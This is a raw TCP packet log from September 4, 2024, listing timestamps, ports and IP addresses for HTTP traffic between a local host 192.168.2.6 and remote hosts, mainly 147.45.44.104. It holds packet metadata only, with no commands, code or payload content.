Sep 4, 2024 17:37:07.089036942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089051008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089083910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089107990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089121103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089131117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089144945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089164972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089198112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089210033 CEST	80	49726	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:07.089234114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089483023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089524031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089528084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089536905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089562893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089581013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089732885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089745998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089756966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089777946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089797020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089838982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089857101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089870930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089883089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089895010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089910984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.089983940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.089996099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090009928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090022087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090029955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090050936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090054035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090092897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090120077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090133905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090161085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090168953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090202093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090214968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090240002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090254068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090327978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090339899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090357065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090365887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090377092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090403080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090678930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090723038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090820074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090861082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090923071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090964079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.090980053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.090990067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091016054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091026068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091067076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091087103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091108084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091130972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091209888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091221094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091232061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091242075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091253042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091259956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091264009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091279984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091289997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091311932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091485977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091497898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091507912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091519117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.091543913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.091562986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.092713118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092770100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092772007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.092782974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092807055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.092817068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.092871904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092881918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092892885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092904091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.092917919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.092947960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093039036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093058109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093076944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093084097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093099117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093113899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093167067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093187094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093199015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093204975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093209028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093223095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093225956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093236923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093239069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093250990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093266010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093291044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093475103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093487024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093497992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093523026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093550920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093615055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093628883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093638897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093661070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093692064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093722105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093734026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093743086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093755960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093765020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093765974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093779087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093790054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093796015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093796015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093802929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.093826056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.093851089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094022036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094059944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094090939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094104052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094126940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094136953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094221115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094232082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094242096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094254017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094259977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094268084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094294071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094536066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094654083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094696045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094727993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094739914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094765902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094775915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094809055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094821930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094831944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094846010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.094858885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094870090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.094899893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.095530987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095541954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095551968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095582008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.095607996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.095678091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095691919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095702887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095716000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.095726013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.095737934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.095765114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.096359968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096407890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.096424103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096437931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096460104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.096472979 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.096527100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096539021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096549034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096561909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.096564054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.096574068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.096597910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.097270012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097312927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.097325087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097336054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097358942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.097371101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.097431898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097445011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097455025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097467899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.097472906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.097496033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.097520113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098249912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098292112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098314047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098326921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098351002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098375082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098391056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098404884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098428965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098429918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098448992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098469019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098592997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098603964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098613977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098624945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098634005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098647118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098656893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098658085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098670959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098686934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098706961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098838091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098881006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098896980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098911047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098922014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.098941088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098963976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.098994017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.099005938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.099037886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.099304914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.155071974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.155092955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.155102015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.155231953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.155273914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.155284882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.155409098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.155409098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.158987999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159037113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.159226894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159240961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159260988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159271955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159271955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.159301043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.159434080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159445047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159456968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.159482956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.159507036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169512987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169562101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169616938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169631004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169753075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169769049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169779062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169783115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169783115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169791937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.169791937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169815063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169842958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.169994116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170007944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170018911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170028925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170041084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170044899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170061111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170083046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170222044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170234919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170245886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170258045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170268059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170269012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170295000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170305014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170396090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170408010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170417070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170428038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170439005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170439959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170466900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170483112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170641899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170654058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170664072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170675039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170686007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170696974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170708895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170732021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170788050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170799971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170810938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170823097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.170833111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.170859098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171020985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171031952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171041012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171062946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171067953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171075106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171086073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171097040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171107054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171108007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171119928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171120882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171133041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171149015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171175003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171443939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171456099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171488047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171581030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171592951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171608925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171619892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171619892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171631098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171633959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171643972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171653032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171654940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171667099 CEST	80	49717	147.45.44.104	192.168.2.6
